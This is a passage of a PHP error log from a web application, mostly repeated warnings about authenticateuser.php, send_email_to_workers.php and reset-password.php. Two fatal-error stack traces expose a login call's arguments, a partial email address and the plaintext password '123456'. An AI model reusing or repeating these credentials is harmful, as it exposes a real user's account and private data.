property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 01:50:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 02:16:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 02:22:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 02:26:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 02:41:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 02:41:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 02:52:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 02:58:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 03:39:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 04:42:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 05:27:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 07:36:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 08:07:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 08:41:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 08:47:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 09:30:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 10:37:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Oct-2024 07:40:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Oct-2024 07:40:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [06-Oct-2024 03:58:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [06-Oct-2024 21:37:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [06-Oct-2024 21:53:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 00:23:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 00:51:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 00:53:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 01:20:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 01:26:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 01:56:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 02:15:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 02:39:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 02:39:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 02:43:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 06:37:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 09:11:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 12:25:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 12:25:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 21:12:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 23:14:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Oct-2024 00:01:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Oct-2024 00:14:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Oct-2024 00:52:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Oct-2024 01:49:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Oct-2024 04:05:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Oct-2024 23:26:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Oct-2024 01:10:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Oct-2024 01:30:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Oct-2024 03:54:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Oct-2024 04:27:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Oct-2024 00:54:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [15-Oct-2024 00:05:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Oct-2024 01:00:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Oct-2024 05:10:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Oct-2024 05:31:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Oct-2024 05:33:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Oct-2024 05:34:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Oct-2024 23:36:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Oct-2024 01:24:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [19-Oct-2024 04:09:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [19-Oct-2024 04:16:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [19-Oct-2024 04:48:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [19-Oct-2024 04:49:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [21-Oct-2024 04:56:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Oct-2024 03:25:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Oct-2024 06:52:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Oct-2024 06:54:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Oct-2024 06:58:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Oct-2024 06:59:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Oct-2024 23:49:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Oct-2024 00:26:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Oct-2024 01:32:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [06-Nov-2024 13:56:14 UTC] PHP Fatal error: Uncaught Error: Call to a member function prepare() on null in /home/emeraadmin/public_html/Classes/Database.php:51 Stack trace: #0 /home/emeraadmin/public_html/Service/UserService.php(17): Database->query('SELECT id, emai...') #1 /home/emeraadmin/public_html/pages/authenticateuser.php(12): UserService->login('pavithrahatsin@...', '123456') #2 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 51 [06-Nov-2024 13:58:07 UTC] PHP Fatal error: Uncaught Error: Call to a member function prepare() on null in /home/emeraadmin/public_html/Classes/Database.php:51 Stack trace: #0 /home/emeraadmin/public_html/Service/UserService.php(17): Database->query('SELECT id, emai...') #1 /home/emeraadmin/public_html/pages/authenticateuser.php(12): UserService->login('pavithrahatsin@...', '123456') #2 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 51 [06-Nov-2024 13:59:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Nov-2024 14:05:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Nov-2024 14:11:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Nov-2024 14:11:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Nov-2024 14:21:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Nov-2024 23:23:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Nov-2024 00:51:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Nov-2024 03:09:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Nov-2024 03:11:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Nov-2024 17:08:38 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [08-Nov-2024 04:01:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Nov-2024 09:45:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Nov-2024 01:34:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [25-Nov-2024 23:56:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 00:13:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 00:20:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 00:20:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 00:21:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 00:24:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 00:26:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 00:28:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 00:31:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Nov-2024 00:38:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Nov-2024 00:42:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 00:43:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 00:44:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 00:50:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 03:36:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 03:37:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 03:39:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 03:40:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 03:41:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Nov-2024 11:27:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [01-Dec-2024 23:51:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Dec-2024 04:28:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Dec-2024 04:28:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Dec-2024 04:29:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Dec-2024 04:29:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Dec-2024 04:29:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Dec-2024 04:30:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Dec-2024 06:05:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Dec-2024 06:07:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Dec-2024 06:08:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [03-Dec-2024 08:18:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [03-Dec-2024 08:25:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [03-Dec-2024 08:29:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [03-Dec-2024 08:39:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Dec-2024 04:38:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Dec-2024 04:38:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Dec-2024 07:22:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Dec-2024 10:30:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Dec-2024 11:08:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Dec-2024 11:09:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Dec-2024 11:09:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Dec-2024 12:15:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Dec-2024 12:29:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Dec-2024 13:10:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Dec-2024 13:24:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Dec-2024 00:20:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Dec-2024 00:31:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Dec-2024 00:41:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Dec-2024 00:43:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Dec-2024 00:43:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Dec-2024 05:31:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Dec-2024 09:57:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Dec-2024 10:00:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Dec-2024 10:00:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Dec-2024 05:44:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Dec-2024 07:32:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Dec-2024 14:54:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Dec-2024 14:55:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Dec-2024 14:55:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Dec-2024 14:55:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Dec-2024 22:39:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Dec-2024 22:59:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Dec-2024 23:02:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Dec-2024 23:02:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Dec-2024 23:03:06 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Dec-2024 23:03:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Dec-2024 23:03:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Dec-2024 23:03:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Dec-2024 23:34:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 00:26:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 01:22:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 02:49:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 09:29:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 10:37:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 21:55:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 22:08:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 22:09:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 22:57:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 23:14:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 23:32:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 23:40:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 23:46:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Dec-2024 00:45:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Dec-2024 10:35:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Dec-2024 22:29:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Dec-2024 06:35:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Dec-2024 21:56:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Dec-2024 22:25:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Dec-2024 23:11:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Dec-2024 23:26:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 00:29:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 00:33:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 00:39:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 00:42:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 00:48:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 00:54:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 01:07:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 01:07:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 01:08:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 01:21:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 01:21:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 03:29:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 04:08:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Dec-2024 16:24:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Dec-2024 22:53:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Dec-2024 04:10:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Dec-2024 06:18:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Dec-2024 07:19:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Dec-2024 09:43:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 00:42:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 00:44:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [17-Dec-2024 08:14:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 08:58:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 09:09:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [17-Dec-2024 13:56:12 UTC] PHP Warning: Undefined property: stdClass::$status in 